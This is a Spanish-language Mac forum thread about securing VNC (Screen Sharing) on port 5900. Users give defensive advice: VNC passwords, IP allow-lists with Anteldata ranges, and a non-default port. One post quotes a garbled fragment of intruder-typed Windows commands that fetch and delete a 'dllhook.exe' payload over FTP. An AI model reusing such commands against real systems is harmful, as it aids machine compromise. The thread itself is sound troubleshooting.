1

Tema: VNC y seguridad

A raíz del problema que estuve teniendo (o tengo, no se)  http://www.macacos.com.uy/foros/viewtopic.php?id=9328   ...investigué un poco y resulta que tener abierto el puerto 5900 y no tener encriptación (SSH), es un penal.
Tengo activo el LittleSnitch como firewall y me está andando bien.

¿Puedo generar una regla en el firewall para que este, esté atento al 5900 y solo deje entrar cierto usuario o que tenga que usarse password?  ..o alguna opción, estoy medio perdido.

iMac 27 | iPhone

2

Re: VNC y seguridad

Con el firewall no podés poner reglas referente a usuarios, etc, podés sólo poner reglas referentes a direcciones IP y/o protocolos y puertos.

El usar password es configuración del servidor VNC

Rule of Extensibility: Design for the future, because it will be here sooner

3

Re: VNC y seguridad

Est3ban escribió:

A raíz del problema que estuve teniendo (o tengo, no se)  http://www.macacos.com.uy/foros/viewtopic.php?id=9328   ...investigué un poco y resulta que tener abierto el puerto 5900 y no tener encriptación (SSH), es un penal.
Tengo activo el LittleSnitch como firewall y me está andando bien.

¿Puedo generar una regla en el firewall para que este, esté atento al 5900 y solo deje entrar cierto usuario o que tenga que usarse password?  ..o alguna opción, estoy medio perdido.

@Est3ban: una cosa primero SSH es distinto de "encripcion" o  cifrado, si bien SSH utiliza conexiones cifradas no es lo mismo que ser un protocolo de cifrado, no se si me explico.
Por otro lado la restricción de usuarios la podes hacer directo en el VNC, eso que te paso  vos no fue un ataque directo es un backdoor que anda en la vuelta, o mejor dicho un zombie (maquina comprometida que trabaja sin que el dueño lo sepa). Ese comando que viste que tipearon que comentas en el otro thread poco va a hacer en tu Mac, si te fijas bien esta intentando meter un .dll (biblioteca de M$) que poco va a poder hacer  en tu OSX.

buscando un poco en google hasta se encuentran videos de como comprometer en 2 clicks un equipo, pero por obvias razones no los voy a poner aqui smile

Mi recomendación es, si vas a usar VNC solo permitirle la entrada a las IP que quieras que se conecten, si es IP variable de uruguay pone de ultima los rangos de IP así achicas la cantidad de equipos que pueden ver el VNC y mitigas la posibilidad de un ataque.

De cualquier forma eso que viste no va a hacerte nada en tu maquina smile


salu2,
PoohMac

There are 10 types of people in the world: Those who understand binary, and those who don't...

“Los videojuegos no afectan a los niños,es decir; si pac-man nos hubiera afectado de niños, ahora estariamos todos moviendonos por habitaciones oscuras, tragando pastillas mágicas y escuchando música repetitiva.”  Kristian Wilson, Nintendo, Inc, 1989

4

Re: VNC y seguridad

Cambiá el puerto por defecto del VNC a otro no conocido (>10.000)

"You're born, you take shit. Get out in the world, you take more shit. Climb a little higher, you take less shit. Until one day, you're up in the rarified atmosphere, and you've forgotten what shit even looks like... Welcome to the layer cake, son."

Eddie Temple, en Layer Cake

5

Re: VNC y seguridad

Bien, gracias por los consejos.

En concreto, no me está pasando hace tiempo, me pasó a principios de febrero cuando publiqué este hilo. Y casi seguro, no fue algo que hice, sino que simplemente dejó de pasar.

Entiendo lo de la máquina zombie, pero me da un cacho de miedo saber que si esos comandos fueran unix y dirigidos a osx, estaría en problemas bastante graves, soy fiel seguidor de los hilos sobre seguridad en este foro y creo haber experimentado en carne propia una de las posibles vias de ataque ...y por un zombie choto!!

Pregunta: ¿que rango de ip sería adecuado como para achicar un poco? ...lo mio es ADSL de anteldata con ip dinámica y tengo una cuenta en DynDns para que me ande el vnc.

Voy a cambiar lo del número de puerto 5900.

iMac 27 | iPhone

6

Re: VNC y seguridad

Pego el texto inicial del otro hilo para que haya más info en este y se siga el tema acá:

Est3ban escribió:

Ayer estuve jugando a configurar el iPod touch para ver el escritorio del iMac con VNC. Esto implicó activar Compartir Pantalla en Preferencias de Sistema.
Ok, todo bien, muy divertido y funcionó al pelo peeeero....
Me pasó varias veces que teniendo Firefox cargado, alguien o algo, empezaba a tipear una sarta de comandos de los cuales pude copiar y pegar la última parte:

e :: ik /ftp 'n 'v 'sÑik /del ik /dllhook.exe /exitecho You got owned

Esto sucedía en el campo Buscar de Firefox, o en el campo de búsquedas de la página de Google. Como si alguien estuviera tipeando, o sea, letra por letra, y no tipo copy paste.

Otro detalle es que cuando el iPod touch no está conectado, el ícono de compartir pantalla no está activo, pero cuando sucedía este "ataque" se activaba solo.

Cosas que pensé: agujero de seguridad en Compartir Pantalla? ...tengo el DynDns activo, ¿será por ahí el ataque?... no es un ataque? ...socooooorooooooo jeje

http://www.macacos.com.uy/foros/viewtopic.php?id=9328

iMac 27 | iPhone

7

Re: VNC y seguridad

http://Apple.slashdot.org/article.pl?sid=09/05/14/2124236&art_pos=4

8

Re: VNC y seguridad

Est3ban escribió:

Bien, gracias por los consejos.

En concreto, no me está pasando hace tiempo, me pasó a principios de febrero cuando publiqué este hilo. Y casi seguro, no fue algo que hice, sino que simplemente dejó de pasar.

Entiendo lo de la máquina zombie, pero me da un cacho de miedo saber que si esos comandos fueran unix y dirigidos a osx, estaría en problemas bastante graves, soy fiel seguidor de los hilos sobre seguridad en este foro y creo haber experimentado en carne propia una de las posibles vias de ataque ...y por un zombie choto!!

Pregunta: ¿que rango de ip sería adecuado como para achicar un poco? ...lo mio es ADSL de anteldata con ip dinámica y tengo una cuenta en DynDns para que me ande el vnc.

Voy a cambiar lo del número de puerto 5900.

@Est3ban, debajo te dejo los rangos que hasta ahora conozco de Anteldata:

        190.0.128.0/20
        190.64.0.0/16
        190.132.0.0/16
        190.133.0.0/16
        190.134.0.0/16
        190.135.0.0/16
        200.2.44.0/24
        200.40.0.0/16
        200.125.0.0/16



saludos,
PoohMac

There are 10 types of people in the world: Those who understand binary, and those who don't...

“Los videojuegos no afectan a los niños,es decir; si pac-man nos hubiera afectado de niños, ahora estariamos todos moviendonos por habitaciones oscuras, tragando pastillas mágicas y escuchando música repetitiva.”  Kristian Wilson, Nintendo, Inc, 1989